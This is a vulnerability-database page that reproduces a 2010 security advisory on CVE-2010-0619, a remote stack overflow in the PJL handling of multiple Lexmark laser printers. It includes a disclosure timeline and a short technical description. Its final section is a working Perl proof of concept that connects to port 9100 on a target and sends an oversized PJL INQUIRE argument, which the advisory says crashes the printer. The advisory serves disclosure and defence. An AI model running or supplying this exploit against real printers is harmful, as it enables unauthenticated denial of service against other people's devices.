Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormFrancis ProvencherPACKETSTORM:87559
HistoryMar 23, 2010 - 12:00 a.m.

Lexmark Laser Printer Stack Overflow

2010-03-2300:00:00
Francis Provencher
packetstormsecurity.com
27

EPSS

0.055

Percentile

93.3%

JSON
`#####################################################################################  
  
Application: Lexmark Multiple Laser Printer Remote Stack Overflow  
  
Platforms: Lexmark Multiple Laser printer  
  
Exploitation: Remote Exploitable  
  
CVE Number: CVE-2010-0619  
  
Discover Date: 2010-01-06  
  
Author: Francis Provencher (Protek Research Lab's)  
  
Website: http://www.protekresearchlab.com  
  
#####################################################################################  
  
1) Introduction  
2) Report Timeline  
3) Technical details  
4) Products affected  
5) The Code  
  
#####################################################################################  
  
=================  
1) Introduction  
=================  
  
Lexmark specializes in printers and printer accessories. Its current  
range of products includes color and monochrome laser printers and  
inkjet printers, both of which may include scanners (including  
all-in-one devices with faxing and copying capabilities and photo  
printers), and dot matrix printers. Lexmark was one of the first  
companies to release wifi inkjet printers and the very first to  
release printers with a web-enabled touchscreen, coming in early  
September of 2009. They also offer a wide variety of laser printers  
with software solutions for more professional printing environments.  
  
(Wikipedia)  
  
#####################################################################################  
  
====================  
2) Report Timeline  
====================  
  
2010-01-06 Vendor Contacted  
2010-01-09 Vendor Response  
2010-01-09 Vendor request a PoC  
2010-01-10 PoC is sent to the vendor  
2010-01-12 Vendor confirme they received PoC  
2010-01-13 Vendor confirm the vulnerability  
2010-03-22 Public release of this advisory  
  
#####################################################################################  
  
======================  
3) Technical details  
======================  
  
Multiple Lexmark Laser Printers contain remote stack overflow  
vulnerabilities in their PJL processing functionality. These  
vulnerabilities could lead to remote code execution on the printer  
without authentication. Device freezes when a specialy PLJ request is  
sent to the daemon with an invalid argument on PJL INQUIRE command.  
  
#####################################################################################  
  
=====================  
4) Product affected  
=====================  
  
The list is too long, you can found information on the Lexmark web site;  
  
http://support.lexmark.com/alerts  
  
  
#####################################################################################  
  
=============  
5) The Code  
=============  
  
  
#!/usr/bin/perl -w  
# Found by Francis Provencher for Protek Research Lab's  
# {PRL} Lexmark Multiple Laser Printer Remote Stack Overflow PoC  
#  
# This PoC will completly DoS the printer and all is services, Use it  
at your own risk.  
#  
  
use IO::Socket;  
if (@ARGV < 1){  
exit  
}  
$ip = $ARGV[0];  
#open the socket  
my $sock = new IO::Socket::INET (  
PeerAddr => $ip,  
PeerPort => '9100',  
Proto => 'tcp',  
);  
  
  
$sock or die "no socket :$!";  
send($sock, "\033%-12345X\@PJL INQUIRE  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n",0);  
  
  
  
close $sock;  
  
  
  
  
#####################################################################################  
(PRL-2010-01)  
`

Related

nvd 1
exploitpack 1
cvelist 1
seebug 1
cve 1
prion 1
securityvulns 2
zdt 1
exploitdb 1
nvd
nvd
CVE-2010-0619
2010-03-24 22:45:15
exploitpack
exploitpack
Lexmark Multiple Laser printers - Remote Stack Overflow
2010-03-25 00:00:00
cvelist
cvelist
CVE-2010-0619
2010-03-24 18:00:00
seebug
seebug
Lexmark Multiple Laser printer Remote Stack Overflow
2014-07-01 00:00:00
cve
cve
CVE-2010-0619
2010-03-24 22:45:15
prion
prion
Stack overflow
2010-03-24 22:45:00
securityvulns
securityvulns
{PRL} Lexmark Multiple Laser Printer Remote Stack Overflow
2010-03-25 00:00:00
Lexmark laser printers multiple security vulnereabilities
2010-03-25 00:00:00
zdt
zdt
Lexmark Multiple Laser printer Remote Stack Overflow
2010-03-25 00:00:00
exploitdb
exploitdb
Lexmark Multiple Laser printers - Remote Stack Overflow
2010-03-25 00:00:00

EPSS

0.055

Percentile

93.3%

JSON
Related for PACKETSTORM:87559
nvd1exploitpack1cvelist1seebug1cve1prion1securityvulns2zdt1exploitdb1